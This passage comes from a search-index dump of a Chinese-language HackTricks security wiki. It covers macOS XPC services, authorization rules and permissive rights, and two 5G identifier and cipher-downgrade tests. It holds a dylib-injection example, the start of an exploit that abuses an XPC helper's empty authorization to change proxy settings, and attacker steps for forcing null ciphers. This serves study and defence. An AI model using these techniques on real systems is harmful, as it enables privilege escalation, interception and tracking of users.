对象","id":"2432","title":"XPC 对象"},"2433":{"body":"这些是位于其他项目的 XPCServices 文件夹中的 .xpc 扩展包,在 Info.plist 中,它们的 CFBundlePackageType 设置为 XPC! 。 该文件具有其他配置键,如 ServiceType,可以是 Application、User、System 或 _SandboxProfile,可以定义沙箱或 _AllowedClients,可能指示联系服务所需的权限或 ID。这些和其他配置选项在服务启动时将有助于配置服务。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 服务","id":"2433","title":"XPC 服务"},"2434":{"body":"应用程序尝试使用 xpc_connection_create_mach_service 连接 到 XPC 服务,然后 launchd 定位守护进程并启动 xpcproxy 。 xpcproxy 强制执行配置的限制,并使用提供的 FDs 和 Mach 端口生成服务。 为了提高 XPC 服务搜索的速度,使用了缓存。 可以使用以下方法跟踪 xpcproxy 的操作: bash supraudit S -C -o /tmp/output /dev/auditpipe XPC库使用kdebug记录调用xpc_ktrace_pid0和xpc_ktrace_pid1的操作。它使用的代码没有文档,因此需要将其添加到/usr/share/misc/trace.codes中。它们的前缀是0x29,例如其中一个是0x29000004:XPC_serializer_pack。 实用程序xpcproxy使用前缀0x22,例如:0x2200001c: xpcproxy:will_do_preexec。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 启动服务","id":"2434","title":"启动服务"},"2435":{"body":"应用程序可以 订阅 不同的事件 消息 ,使其能够在发生此类事件时 按需启动 。这些服务的 设置 在 launchd plist文件 中完成,位于 与之前相同的目录 中,并包含一个额外的**LaunchEvent**键。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC事件消息","id":"2435","title":"XPC事件消息"},"2436":{"body":"当一个进程尝试通过XPC连接调用一个方法时, XPC服务应该检查该进程是否被允许连接 。以下是检查的常见方法和常见陷阱: macOS XPC Connecting Process Check","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC连接进程检查","id":"2436","title":"XPC连接进程检查"},"2437":{"body":"苹果还允许应用程序 配置一些权限以及如何获取它们 ,因此如果调用进程拥有这些权限,它将 被允许调用 XPC服务中的方法: macOS XPC Authorization","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC授权","id":"2437","title":"XPC授权"},"2438":{"body":"要嗅探XPC消息,可以使用 xpcspy ,它使用 Frida 。 bash # Install\\npip3 
install xpcspy\\npip3 install xpcspy --no-deps # To not make xpcspy install Frida 15 and downgrade your Frida installation # Start sniffing\\nxpcspy -U -r -W \\n## Using filters (i: for input, o: for output)\\nxpcspy -U -t \'i:com.apple.*\' -t \'o:com.apple.*\' -r 另一个可能使用的工具是 XPoCe2 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC嗅探器","id":"2438","title":"XPC嗅探器"},"2439":{"body":"xpc_server.c\\nxpc_client.c\\nxyz.hacktricks.service.plist c // gcc xpc_server.c -o xpc_server #include static void handle_event(xpc_object_t event) {\\nif (xpc_get_type(event) == XPC_TYPE_DICTIONARY) {\\n// Print received message\\nconst char* received_message = xpc_dictionary_get_string(event, \\"message\\");\\nprintf(\\"Received message: %s\\\\n\\", received_message); // Create a response dictionary\\nxpc_object_t response = xpc_dictionary_create(NULL, NULL, 0);\\nxpc_dictionary_set_string(response, \\"received\\", \\"received\\"); // Send response\\nxpc_connection_t remote = xpc_dictionary_get_remote_connection(event);\\nxpc_connection_send_message(remote, response); // Clean up\\nxpc_release(response);\\n}\\n} static void handle_connection(xpc_connection_t connection) {\\nxpc_connection_set_event_handler(connection, ^(xpc_object_t event) {\\nhandle_event(event);\\n});\\nxpc_connection_resume(connection);\\n} int main(int argc, const char *argv[]) {\\nxpc_connection_t service = xpc_connection_create_mach_service(\\"xyz.hacktricks.service\\",\\ndispatch_get_main_queue(),\\nXPC_CONNECTION_MACH_SERVICE_LISTENER);\\nif (!service) {\\nfprintf(stderr, \\"Failed to create service.\\\\n\\");\\nexit(EXIT_FAILURE);\\n} xpc_connection_set_event_handler(service, ^(xpc_object_t event) {\\nxpc_type_t type = xpc_get_type(event);\\nif (type == XPC_TYPE_CONNECTION) {\\nhandle_connection(event);\\n}\\n}); xpc_connection_resume(service);\\ndispatch_main(); return 0;\\n} c // gcc xpc_client.c -o xpc_client #include 
int main(int argc, const char *argv[]) {\\nxpc_connection_t connection = xpc_connection_create_mach_service(\\"xyz.hacktricks.service\\", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {\\nif (xpc_get_type(event) == XPC_TYPE_DICTIONARY) {\\n// Print received message\\nconst char* received_message = xpc_dictionary_get_string(event, \\"received\\");\\nprintf(\\"Received message: %s\\\\n\\", received_message);\\n}\\n}); xpc_connection_resume(connection); xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);\\nxpc_dictionary_set_string(message, \\"message\\", \\"Hello, Server!\\"); xpc_connection_send_message(connection, message); dispatch_main(); return 0;\\n} xml \\n \\n\\nLabel\\nxyz.hacktricks.service\\nMachServices\\n\\nxyz.hacktricks.service\\n\\n\\nProgram\\n/tmp/xpc_server\\nProgramArguments\\n\\n/tmp/xpc_server\\n\\n\\n bash # Compile the server & client\\ngcc xpc_server.c -o xpc_server\\ngcc xpc_client.c -o xpc_client # Save server on it\'s location\\ncp xpc_server /tmp # Load daemon\\nsudo cp xyz.hacktricks.service.plist /Library/LaunchDaemons\\nsudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.service.plist # Call client\\n./xpc_client # Clean\\nsudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.service.plist\\nsudo rm /Library/LaunchDaemons/xyz.hacktricks.service.plist /tmp/xpc_server","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 通信 C 代码示例","id":"2439","title":"XPC 通信 C 代码示例"},"244":{"body":"预期行为:UE/USIM 必须发送 SUCI(使用家庭网络公钥加密的 SUPI)。如果在 Registration Request 中发现明文 SUPI/IMSI,则表示存在隐私缺陷,可能导致持久的用户追踪。 如何测试: 捕获 InitialUEMessage 中的首个 NAS 消息并检查 Mobile Identity IE。 Wireshark 快速检查: 它应该解码为 SUCI,而不是 IMSI。 过滤示例:nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci 应存在;若不存在且同时出现 imsi 则表明泄露。 需要收集的信息: 如果被暴露,记录 MCC/MNC/MSIN;按 UE 记录并在不同时间/位置间跟踪。 缓解措施: 强制只允许 SUCI 的 UE/USIM;对任何出现在初始 NAS 中的 
IMSI/SUPI 发出告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.1 标识符隐私: SUCI 故障导致暴露 SUPI/IMSI","id":"244","title":"9.1 标识符隐私: SUCI 故障导致暴露 SUPI/IMSI"},"2440":{"body":"oc_xpc_server.m\\noc_xpc_client.m\\nxyz.hacktricks.svcoc.plist objectivec // gcc -framework Foundation oc_xpc_server.m -o oc_xpc_server\\n#include @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end @interface MyXPCObject : NSObject \\n@end @implementation MyXPCObject\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply {\\nNSLog(@\\"Received message: %@\\", some_string);\\nNSString *response = @\\"Received\\";\\nreply(response);\\n}\\n@end @interface MyDelegate : NSObject \\n@end @implementation MyDelegate - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {\\nnewConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)]; MyXPCObject *my_object = [MyXPCObject new]; newConnection.exportedObject = my_object; [newConnection resume];\\nreturn YES;\\n}\\n@end int main(void) { NSXPCListener *listener = [[NSXPCListener alloc] initWithMachServiceName:@\\"xyz.hacktricks.svcoc\\"]; id delegate = [MyDelegate new];\\nlistener.delegate = delegate;\\n[listener resume]; sleep(10); // Fake something is done and then it ends\\n} objectivec // gcc -framework Foundation oc_xpc_client.m -o oc_xpc_client\\n#include @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end int main(void) {\\nNSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:@\\"xyz.hacktricks.svcoc\\" options:NSXPCConnectionPrivileged];\\nconnection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)];\\n[connection resume]; [[connection remoteObjectProxy] sayHello:@\\"Hello, Server!\\" withReply:^(NSString *response) {\\nNSLog(@\\"Received 
response: %@\\", response);\\n}]; [[NSRunLoop currentRunLoop] run]; return 0;\\n} xml \\n \\n\\nLabel\\nxyz.hacktricks.svcoc\\nMachServices\\n\\nxyz.hacktricks.svcoc\\n\\n\\nProgram\\n/tmp/oc_xpc_server\\nProgramArguments\\n\\n/tmp/oc_xpc_server\\n\\n\\n bash # Compile the server & client\\ngcc -framework Foundation oc_xpc_server.m -o oc_xpc_server\\ngcc -framework Foundation oc_xpc_client.m -o oc_xpc_client # Save server on it\'s location\\ncp oc_xpc_server /tmp # Load daemon\\nsudo cp xyz.hacktricks.svcoc.plist /Library/LaunchDaemons\\nsudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist # Call client\\n./oc_xpc_client # Clean\\nsudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist\\nsudo rm /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist /tmp/oc_xpc_server","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 通信 Objective-C 代码示例","id":"2440","title":"XPC 通信 Objective-C 代码示例"},"2441":{"body":"objectivec // gcc -dynamiclib -framework Foundation oc_xpc_client.m -o oc_xpc_client.dylib\\n// gcc injection example:\\n// DYLD_INSERT_LIBRARIES=oc_xpc_client.dylib /path/to/vuln/bin #import @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end __attribute__((constructor))\\nstatic void customConstructor(int argc, const char **argv)\\n{\\nNSString* _serviceName = @\\"xyz.hacktricks.svcoc\\"; NSXPCConnection* _agentConnection = [[NSXPCConnection alloc] initWithMachServiceName:_serviceName options:4096]; [_agentConnection setRemoteObjectInterface:[NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)]]; [_agentConnection resume]; [[_agentConnection remoteObjectProxyWithErrorHandler:^(NSError* error) {\\n(void)error;\\nNSLog(@\\"Connection Failure\\");\\n}] sayHello:@\\"Hello, Server!\\" withReply:^(NSString *response) {\\nNSLog(@\\"Received response: %@\\", response);\\n} 
];\\nNSLog(@\\"Done!\\"); return;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 客户端在 Dylb 代码中","id":"2441","title":"客户端在 Dylb 代码中"},"2442":{"body":"此功能由 RemoteXPC.framework(来自 libxpc)提供,允许通过不同主机之间的 XPC 进行通信。 支持远程 XPC 的服务将在其 plist 中具有键 UsesRemoteXPC,就像 /System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist 的情况一样。然而,尽管该服务将与 launchd 注册,但提供该功能的是 UserEventAgent,其插件为 com.apple.remoted.plugin 和 com.apple.remoteservicediscovery.events.plugin。 此外,RemoteServiceDiscovery.framework 允许从 com.apple.remoted.plugin 获取信息,暴露出如 get_device、get_unique_device、connect 等函数... 一旦使用 connect 并收集到服务的 socket fd,就可以使用 remote_xpc_connection_* 类。 可以使用 cli 工具 /usr/libexec/remotectl 获取有关远程服务的信息,使用的参数包括: bash /usr/libexec/remotectl list # Get bridge devices\\n/usr/libexec/remotectl show ...# Get device properties and services\\n/usr/libexec/remotectl dumpstate # Like dump withuot indicateing a servie\\n/usr/libexec/remotectl [netcat|relay] ... # Expose a service in a port\\n... BridgeOS与主机之间的通信通过专用的IPv6接口进行。MultiverseSupport.framework允许建立套接字,其fd将用于通信。 可以使用netstat、nettop或开源选项netbottom找到这些通信。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » Remote XPC","id":"2442","title":"Remote XPC"},"2443":{"body":"Reading time: 17 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » macOS XPC 授权","id":"2443","title":"macOS XPC 授权"},"2444":{"body":"苹果还提出了另一种方法来验证连接进程是否具有 调用暴露的 XPC 方法的权限 。 当应用程序需要 以特权用户身份执行操作 时,它通常不会以特权用户身份运行,而是作为 root 安装一个 HelperTool 作为 XPC 服务,可以从应用程序调用以执行这些操作。然而,调用该服务的应用程序应该具有足够的授权。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » XPC 授权","id":"2444","title":"XPC 授权"},"2445":{"body":"一个例子可以在 EvenBetterAuthorizationSample 中找到。在 App/AppDelegate.m 中,它尝试 连接 到 HelperTool 。而在 HelperTool/HelperTool.m 中,函数 shouldAcceptNewConnection 不会检查 之前提到的任何要求。它将始终返回 YES: objectivec - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection\\n// Called by our XPC listener when a new connection comes in. 
We configure the connection\\n// with our protocol and ourselves as the main object.\\n{\\nassert(listener == self.listener);\\n#pragma unused(listener)\\nassert(newConnection != nil); newConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];\\nnewConnection.exportedObject = self;\\n[newConnection resume]; return YES;\\n} 有关如何正确配置此检查的更多信息: macOS XPC Connecting Process Check","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » ShouldAcceptNewConnection 始终为 YES","id":"2445","title":"ShouldAcceptNewConnection 始终为 YES"},"2446":{"body":"然而,当调用 HelperTool 中的方法时,确实会进行一些 授权 。 App/AppDelegate.m 中的 applicationDidFinishLaunching 函数将在应用程序启动后创建一个空的授权引用。这应该始终有效。 然后,它将尝试通过调用 setupAuthorizationRights 来 添加一些权限 到该授权引用: objectivec - (void)applicationDidFinishLaunching:(NSNotification *)note\\n{\\n[...]\\nerr = AuthorizationCreate(NULL, NULL, 0, &self->_authRef);\\nif (err == errAuthorizationSuccess) {\\nerr = AuthorizationMakeExternalForm(self->_authRef, &extForm);\\n}\\nif (err == errAuthorizationSuccess) {\\nself.authorization = [[NSData alloc] initWithBytes:&extForm length:sizeof(extForm)];\\n}\\nassert(err == errAuthorizationSuccess); // If we successfully connected to Authorization Services, add definitions for our default\\n// rights (unless they\'re already in the database). if (self->_authRef) {\\n[Common setupAuthorizationRights:self->_authRef];\\n} [self.window makeKeyAndOrderFront:self];\\n} 函数 setupAuthorizationRights 来自 Common/Common.m,将把应用程序的权限存储在授权数据库 /var/db/auth.db 中。请注意,它只会添加尚未在数据库中的权限: objectivec + (void)setupAuthorizationRights:(AuthorizationRef)authRef\\n// See comment in header.\\n{\\nassert(authRef != NULL);\\n[Common enumerateRightsUsingBlock:^(NSString * authRightName, id authRightDefault, NSString * authRightDesc) {\\nOSStatus blockErr; // First get the right. 
If we get back errAuthorizationDenied that means there\'s\\n// no current definition, so we add our default one. blockErr = AuthorizationRightGet([authRightName UTF8String], NULL);\\nif (blockErr == errAuthorizationDenied) {\\nblockErr = AuthorizationRightSet(\\nauthRef, // authRef\\n[authRightName UTF8String], // rightName\\n(__bridge CFTypeRef) authRightDefault, // rightDefinition\\n(__bridge CFStringRef) authRightDesc, // descriptionKey\\nNULL, // bundle (NULL implies main bundle)\\nCFSTR(\\"Common\\") // localeTableName\\n);\\nassert(blockErr == errAuthorizationSuccess);\\n} else {\\n// A right already exists (err == noErr) or any other error occurs, we\\n// assume that it has been set up in advance by the system administrator or\\n// this is the second time we\'ve run. Either way, there\'s nothing more for\\n// us to do.\\n}\\n}];\\n} 函数 enumerateRightsUsingBlock 用于获取在 commandInfo 中定义的应用程序权限: objectivec static NSString * kCommandKeyAuthRightName = @\\"authRightName\\";\\nstatic NSString * kCommandKeyAuthRightDefault = @\\"authRightDefault\\";\\nstatic NSString * kCommandKeyAuthRightDesc = @\\"authRightDescription\\"; + (NSDictionary *)commandInfo\\n{\\nstatic dispatch_once_t sOnceToken;\\nstatic NSDictionary * sCommandInfo; dispatch_once(&sOnceToken, ^{\\nsCommandInfo = @{\\nNSStringFromSelector(@selector(readLicenseKeyAuthorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.readLicenseKey\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleClassAllow,\\nkCommandKeyAuthRightDesc : NSLocalizedString(\\n@\\"EBAS is trying to read its license key.\\",\\n@\\"prompt shown when user is required to authorize to read the license key\\"\\n)\\n},\\nNSStringFromSelector(@selector(writeLicenseKey:authorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.writeLicenseKey\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleAuthenticateAsAdmin,\\nkCommandKeyAuthRightDesc : 
NSLocalizedString(\\n@\\"EBAS is trying to write its license key.\\",\\n@\\"prompt shown when user is required to authorize to write the license key\\"\\n)\\n},\\nNSStringFromSelector(@selector(bindToLowNumberPortAuthorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.startWebService\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleClassAllow,\\nkCommandKeyAuthRightDesc : NSLocalizedString(\\n@\\"EBAS is trying to start its web service.\\",\\n@\\"prompt shown when user is required to authorize to start the web service\\"\\n)\\n}\\n};\\n});\\nreturn sCommandInfo;\\n} + (NSString *)authorizationRightForCommand:(SEL)command\\n// See comment in header.\\n{\\nreturn [self commandInfo][NSStringFromSelector(command)][kCommandKeyAuthRightName];\\n} + (void)enumerateRightsUsingBlock:(void (^)(NSString * authRightName, id authRightDefault, NSString * authRightDesc))block\\n// Calls the supplied block with information about each known authorization right..\\n{\\n[self.commandInfo enumerateKeysAndObjectsUsingBlock:^(id key, id obj, BOOL *stop) {\\n#pragma unused(key)\\n#pragma unused(stop)\\nNSDictionary * commandDict;\\nNSString * authRightName;\\nid authRightDefault;\\nNSString * authRightDesc; // If any of the following asserts fire it\'s likely that you\'ve got a bug\\n// in sCommandInfo. 
commandDict = (NSDictionary *) obj;\\nassert([commandDict isKindOfClass:[NSDictionary class]]); authRightName = [commandDict objectForKey:kCommandKeyAuthRightName];\\nassert([authRightName isKindOfClass:[NSString class]]); authRightDefault = [commandDict objectForKey:kCommandKeyAuthRightDefault];\\nassert(authRightDefault != nil); authRightDesc = [commandDict objectForKey:kCommandKeyAuthRightDesc];\\nassert([authRightDesc isKindOfClass:[NSString class]]); block(authRightName, authRightDefault, authRightDesc);\\n}];\\n} 这意味着在这个过程结束时,commandInfo 中声明的权限将存储在 /var/db/auth.db 中。请注意,您可以找到 每种方法 需要 身份验证 、 权限名称 和 kCommandKeyAuthRightDefault 。后者 指示谁可以获得此权限 。 有不同的范围来指示谁可以访问某个权限。其中一些在 AuthorizationDB.h 中定义(您可以在 这里找到所有内容 ),但总结如下: 名称值描述kAuthorizationRuleClassAllowallow任何人kAuthorizationRuleClassDenydeny没有人kAuthorizationRuleIsAdminis-admin当前用户需要是管理员(在管理员组内)kAuthorizationRuleAuthenticateAsSessionUserauthenticate-session-owner要求用户进行身份验证。kAuthorizationRuleAuthenticateAsAdminauthenticate-admin要求用户进行身份验证。他需要是管理员(在管理员组内)kAuthorizationRightRulerule指定规则kAuthorizationCommentcomment指定一些关于权限的额外评论","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 应用程序权限","id":"2446","title":"应用程序权限"},"2447":{"body":"在 HelperTool/HelperTool.m 中,函数 readLicenseKeyAuthorization 检查调用者是否被授权 执行此方法 ,通过调用函数 checkAuthorization 。该函数将检查调用进程发送的 authData 是否具有 正确格式 ,然后检查 获取调用特定方法的权限所需的内容 。如果一切顺利, 返回的 error 将为 nil : objectivec - (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command\\n{\\n[...] // First check that authData looks reasonable. error = nil;\\nif ( (authData == nil) || ([authData length] != sizeof(AuthorizationExternalForm)) ) {\\nerror = [NSError errorWithDomain:NSOSStatusErrorDomain code:paramErr userInfo:nil];\\n} // Create an authorization ref from that the external form data contained within. 
if (error == nil) {\\nerr = AuthorizationCreateFromExternalForm([authData bytes], &authRef); // Authorize the right associated with the command. if (err == errAuthorizationSuccess) {\\nAuthorizationItem oneRight = { NULL, 0, NULL, 0 };\\nAuthorizationRights rights = { 1, &oneRight }; oneRight.name = [[Common authorizationRightForCommand:command] UTF8String];\\nassert(oneRight.name != NULL); err = AuthorizationCopyRights(\\nauthRef,\\n&rights,\\nNULL,\\nkAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed,\\nNULL\\n);\\n}\\nif (err != errAuthorizationSuccess) {\\nerror = [NSError errorWithDomain:NSOSStatusErrorDomain code:err userInfo:nil];\\n}\\n} if (authRef != NULL) {\\njunk = AuthorizationFree(authRef, 0);\\nassert(junk == errAuthorizationSuccess);\\n} return error;\\n} 注意,要 检查获取调用该方法的权限 ,函数 authorizationRightForCommand 只会检查之前的评论对象 commandInfo 。然后,它将调用 AuthorizationCopyRights 来检查 是否具有调用该函数的权限 (注意,标志允许与用户交互)。 在这种情况下,要调用函数 readLicenseKeyAuthorization,kCommandKeyAuthRightDefault 被定义为 @kAuthorizationRuleClassAllow。因此, 任何人都可以调用它 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 权限验证","id":"2447","title":"权限验证"},"2448":{"body":"提到这些信息存储在 /var/db/auth.db。您可以使用以下命令列出所有存储的规则: sql sudo sqlite3 /var/db/auth.db\\nSELECT name FROM rules;\\nSELECT name FROM rules WHERE name LIKE \'%safari%\'; 然后,您可以通过以下方式查看谁可以访问该权限: bash security authorizationdb read com.apple.safaridriver.allow","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » DB 信息","id":"2448","title":"DB 信息"},"2449":{"body":"您可以在 这里 找到 所有权限配置 ,但不需要用户交互的组合如下: \'authenticate-user\': \'false\' 这是最直接的键。如果设置为false,则表示用户不需要提供身份验证即可获得此权限。 这与下面的两个中的一个或指示用户必须属于的组结合使用。 \'allow-root\': \'true\' 
如果用户以根用户身份操作(具有提升的权限),并且此键设置为true,则根用户可能在没有进一步身份验证的情况下获得此权限。然而,通常情况下,获得根用户状态已经需要身份验证,因此对于大多数用户来说,这并不是一个“无身份验证”的场景。 \'session-owner\': \'true\' 如果设置为true,会话的所有者(当前登录的用户)将自动获得此权限。如果用户已经登录,这可能会绕过额外的身份验证。 \'shared\': \'true\' 此键不在没有身份验证的情况下授予权限。相反,如果设置为true,则意味着一旦权限经过身份验证,它可以在多个进程之间共享,而无需每个进程重新进行身份验证。但初始授予权限仍然需要身份验证,除非与其他键结合使用,如\'authenticate-user\': \'false\'。 您可以 使用此脚本 来获取有趣的权限: bash Rights with \'authenticate-user\': \'false\':\\nis-admin (admin), is-admin-nonshared (admin), is-appstore (_appstore), is-developer (_developer), is-lpadmin (_lpadmin), is-root (run as root), is-session-owner (session owner), is-webdeveloper (_webdeveloper), system-identity-write-self (session owner), system-install-iap-software (run as root), system-install-software-iap (run as root) Rights with \'allow-root\': \'true\':\\ncom-apple-aosnotification-findmymac-remove, com-apple-diskmanagement-reservekek, com-apple-openscripting-additions-send, com-apple-reportpanic-fixright, com-apple-servicemanagement-blesshelper, com-apple-xtype-fontmover-install, com-apple-xtype-fontmover-remove, com-apple-dt-instruments-process-analysis, com-apple-dt-instruments-process-kill, com-apple-pcastagentconfigd-wildcard, com-apple-trust-settings-admin, com-apple-wifivelocity, com-apple-wireless-diagnostics, is-root, system-install-iap-software, system-install-software, system-install-software-iap, system-preferences, system-preferences-accounts, system-preferences-datetime, system-preferences-energysaver, system-preferences-network, system-preferences-printing, system-preferences-security, system-preferences-sharing, system-preferences-softwareupdate, system-preferences-startupdisk, system-preferences-timemachine, system-print-operator, system-privilege-admin, system-services-networkextension-filtering, system-services-networkextension-vpn, system-services-systemconfiguration-network, system-sharepoints-wildcard Rights with \'session-owner\': \'true\':\\nauthenticate-session-owner, 
authenticate-session-owner-or-admin, authenticate-session-user, com-apple-safari-allow-apple-events-to-run-javascript, com-apple-safari-allow-javascript-in-smart-search-field, com-apple-safari-allow-unsigned-app-extensions, com-apple-safari-install-ephemeral-extensions, com-apple-safari-show-credit-card-numbers, com-apple-safari-show-passwords, com-apple-icloud-passwordreset, com-apple-icloud-passwordreset, is-session-owner, system-identity-write-self, use-login-window-ui","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 宽松权限","id":"2449","title":"宽松权限"},"245":{"body":"背景: UE 在 Registration Request 的 UE Security Capability IE 中通告支持的 EEA(加密)和 EIA(完整性)。 常见映射:EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC;EEA0/EIA0 为 null 算法。 问题: 由于 Registration Request 未受完整性保护,on-path 攻击者可以清除能力位以在后续的 Security Mode Command 中强制选择 EEA0/EIA0。部分实现错误地在紧急服务之外允许 null 算法。 攻击步骤(进攻方): 截获 InitialUEMessage 并修改 NAS UE Security Capability,使其只通告 EEA0/EIA0。 使用 Sni5Gect,hook NAS 消息并在转发前补丁能力位。 观察 AMF 是否接受 null 加密/完整性并以 EEA0/EIA0 完成 Security Mode。 验证/可见性: 在 Wireshark 中,确认 Security Mode Command/Complete 之后选定的算法。 示例被动嗅探输出: Encyrption in use [EEA0]\\nIntegrity in use [EIA0, EIA1, EIA2]\\nSUPI (MCC+MNC+MSIN) 9997000000001 Mitigations (must): 配置 AMF/policy 拒绝 EEA0/EIA0,除非严格要求(例如 emergency calls)。 优先至少强制执行 EEA2/EIA2;对任何协商 null algorithms 的 NAS 安全上下文进行记录并触发告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.2 能力降级到 null 算法(EEA0/EIA0)","id":"245","title":"9.2 能力降级到 null 算法(EEA0/EIA0)"},"2450":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 反向授权","id":"2450","title":"反向授权"},"2451":{"body":"如果你发现函数: [HelperTool checkAuthorization:command:] ,那么这个进程可能正在使用前面提到的授权模式: 如果这个函数调用了诸如 
AuthorizationCreateFromExternalForm、authorizationRightForCommand、AuthorizationCopyRights、AuthorizationFree
MachServices\\n\\ncom.example.HelperTool\\n\\n\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 协议通信","id":"2452","title":"协议通信"},"2453":{"body":"在此示例中创建了: 协议的定义及其函数 一个空的授权,用于请求访问 与 XPC 服务的连接 如果连接成功,则调用该函数 objectivec // gcc -framework Foundation -framework Security expl.m -o expl #import \\n#import // Define a unique service name for the XPC helper\\nstatic NSString* XPCServiceName = @\\"com.example.XPCHelper\\"; // Define the protocol for the helper tool\\n@protocol XPCHelperProtocol\\n- (void)applyProxyConfigWithAuthorization:(NSData *)authData settings:(NSDictionary *)settings reply:(void (^)(NSError *))callback;\\n- (void)resetProxyConfigWithAuthorization:(NSData *)authData restoreDefault:(BOOL)shouldRestore reply:(void (^)(NSError *))callback;\\n- (void)legacyConfigureProxyWithAuthorization:(NSData *)authData enabled:(BOOL)isEnabled host:(NSString *)hostAddress port:(NSString *)portNumber reply:(void (^)(NSError *, BOOL))callback;\\n- (void)fetchVersionWithReply:(void (^)(NSString *))callback;\\n- (void)establishConnectionWithReply:(void (^)(NSXPCListenerEndpoint *))callback;\\n@end int main(void) {\\nNSData *authData;\\nOSStatus status;\\nAuthorizationExternalForm authForm;\\nAuthorizationRef authReference = {0};\\nNSString *proxyAddress = @\\"127.0.0.1\\";\\nNSString *proxyPort = @\\"4444\\";\\nBoolean isProxyEnabled = true; // Create an empty authorization reference\\nstatus = AuthorizationCreate(NULL, 